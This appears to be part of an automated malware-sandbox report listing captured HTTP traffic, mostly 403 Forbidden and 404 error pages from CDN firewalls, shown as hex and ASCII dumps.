                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qzmJaqoVUCZ64rGyj%2BQpM2aXqMNrSKVJGdc9Y84sSmArWM4bD11jMRAVt9nK3FZ7LV37WJ8tHV6vENgxlqeR%2BCllyfaymWk0P2O3Hy5DN8yc6bGNwnLVUHLaYY6isS3n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8137190269b00fbd-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Zen-Fury: aae17c78fba3a69d4c7375a3148cfa2443b0668bCache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Mon, 09 Oct 2023 13:51:19 GMTX-Cache-Status: Server: ZENEDGEData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 33 31 37 31 22 2c 20 31 36 39 36 38 35 39 34 37 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 39 36 38 35 39 34 31 37 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 31 35 36 37 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 4d 6f 6e 2c 20 30 39 20 4f 63 74 20 32 30 32 33 20 31 33 3a 35 33 3a 31 39 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC3171", 1696859479, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1696859417 * 3.1415926535898; v = Math.floor(v); do
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:19 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZJZ1NKDlQ748bDvDFrAQIe3%2BOtrZaF0siy1cq%2FkjE7XaifS8hEtllM%2Bx6FMiqVWATjG9Dm0SDkz2mdBXZ%2B%2FyjLx%2FM%2Ba46WHzy%2BLqOmf1cJZtzTS06%2BOJYrG87x9p6lXN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813719037ac20fbd-LAXalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:19 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Isf08WvJ%2Fe6T%2FtKnBCayMntDQqlqzWMVPgymhoBBslepNj%2BCpd2OrEyDwigR5S4ubUF08PN4fD6UodsgvUUxGzs7ubyLhpsuXN9fLzambbfHOlgZC1s8LXeElAgZCJQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813719020b98534f-LAXalt-svc: h3=":443"; ma=86400Data Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a Data Ascii: 224<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:20 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveServer: nginxVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:20 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveX-Seen-By: Qizr2MOzfO8jjTBKBVmOj6nPWIDxfKj16yM6xXYJ3IE=,m0j2EEknGIVUW/liY8BLLjmaS7Ki5l/bn9NiiirFyVEm++C2XkuTvnlRFg2XiSDLX-Wix-Request-Id: 1696859480.4523167546648118156X-Content-Type-Options: nosniffData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 09 Oct 2023 13:51:22 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: max-age=15Expires: Mon, 09 Oct 2023 13:51:37 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6TufJptVTTzKhaWUNk%2F7RbLC7N8wOWY76oOtpLycEQp1lULcOsbOzyp%2F%2FW1NUUzm4uXnRTUUxx5tgRh6ZNU3zxYdHGroi%2Fcp9ycpiw%2Fflgw9aucOCTSDVpBYSCqItME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 813719132b017c62-LAXalt-svc: h3=":443"; ma=86400Data Raw: 31 35 65 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 Data Ascii: 15e3<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-U
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Mon, 09 Oct 2023 13:51:22 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 11003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 6c 69 6e 6b 22 3e 42 61 63 6b 20 74 6f 20 73 75 63 75 72 69 2e 6e 65 74 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 68 65 61 64 65 72 3e 0a 0a 0d 0a 34 63 66 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 70 70 2d 63 6f 6e 74 65 6e 74 20 61 63 63 65 73 73 2d 64 65 6e 69 65 64 20 63 6c 65 61 72 66 69 78 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 78 20 63 65 6e 74 65 72 20 77 69 64 74 68 2d 6d 61 78 2d 39 34 30 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 62 72 61 6e 64 2d 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 09 Oct 2023 13:51:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 09 Oct 2023 13:51:24 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenConnection: Keep-AliveKeep-Alive: timeout=5, max=100cache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1229date: Mon, 09 Oct 2023 13:51:23 GMTserver: LiteSpeedx-hostname: ams111.yourwebhoster.comData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 